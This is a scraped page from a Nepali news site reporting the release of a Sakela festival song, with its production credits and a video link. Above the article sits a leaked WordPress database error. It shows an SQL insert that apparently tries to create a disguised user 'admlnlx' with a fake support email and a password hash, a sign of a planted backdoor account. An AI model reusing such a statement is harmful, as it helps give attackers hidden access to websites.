WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BpUfDOnX4hO3Cdtvkp531T7Bzjba5p1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 09:15:40', '', 'admlnlx', 'admlnlx')

विनायो मुर्चुङ्गा बोलको गीत सार्वजनिक (भिडियो सहित) – Gaule Khabar

विनायो मुर्चुङ्गा बोलको गीत सार्वजनिक (भिडियो सहित)

विनायो मुर्चुङ्गा बोलको गीत सार्वजनिक (भिडियो सहित)

काठमाण्डौ । किरातिहरुको उभौली चाड साकेलाको अवसरमा “विनायो मुर्चुङ्गा” बोलको गीत सार्वजनिक भएको छ ।

गीतकार मंगल राई “साईला”को शब्द, मनमावी राई, रश्मि राई, नारायण राई र मन्दिप राई को स्वर रहेको छ । किराती मिथक, सभ्यता, संस्कार, सस्कृति र समग्र किरात समुदायको मौलिक विषय बस्तुको पेरीफेरीमा रहेर रचना गरिएको साकेला गीत “विनायो मुर्चुङ्गा” गीतकार राईको “सुम्निमा-पारुहाङ म्युजिक” युटुव च्यानल मार्फत आज सार्वजनिक गरिएको हो ।

प्रीयजन राईले संगीत, बलराम समालले संगीत संयोजन, राजु कार्कीले मिक्सिङ मास्टरिङ गरेका गीत स्टुडियो किङमा सुरेश राई र मनोज सामसोङ राईले रेकर्डिङ गरेका हुन् ।

सार्वजनिक साकेला गीतको छयाङ्कन विरान तिलुङ, विकाश दहाल, प्रकाशमा समीर स्याङबो, सम्पादन दुर्गा बान्तावा राई, नृत्य निदेशन देवु राई, निर्देशनमा प्रीयजन राईले गरेका छन ।https://youtu.be/oNXi1VQji-k

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका